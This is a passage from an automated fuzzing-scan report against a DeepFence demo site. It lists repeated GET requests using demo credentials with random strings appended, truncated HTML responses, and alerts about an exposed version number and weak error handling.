src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #85\nScan Fuzzing ScanSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioQs05Ksp\nDemoUser1# gzBUt\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #86\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHtHyP\nDemoUser1# cFHDoriCjF2VAL\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #87\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUjaXMqsgg0F7iB\nDemoUser1# irHJ5xNfF0M0PJ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#provoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #88\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioQ3q6L\nDemoUser1# WKyCe92f\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #89\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioZ2t4fHTeNVh0UTrDemoUser1# kYb6GcX1EW\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #90\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iog8dIe7ig5O\nDemoUser1# jUlu7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #91\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioi7qOFSx2Z\nDemoUser1# 9ClB7qCVmQN\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #92\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iojMOjPZhyk3XSI7M\nDemoUser1# aFz6Wk\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #93\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioC78YCKd\nDemoUser1# 4EhC6QB2mHtj6p\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #94\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOCQ8H\nDemoUser1# crcJu\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #95Scan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioYSt63\nDemoUser1# Ft39rj2fwYTNr7M\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #96\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io47SMZZ6r7D7xaH\nDemoUser1# W6AyehCwVG7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #97\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUKT3ftJhiG6JCx\nDemoUser1# U9xp12q3nTb4tGL\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #98\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioQDUV5DLRa9tMZNc\nDemoUser1# wPgy6uPAQjjg\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> 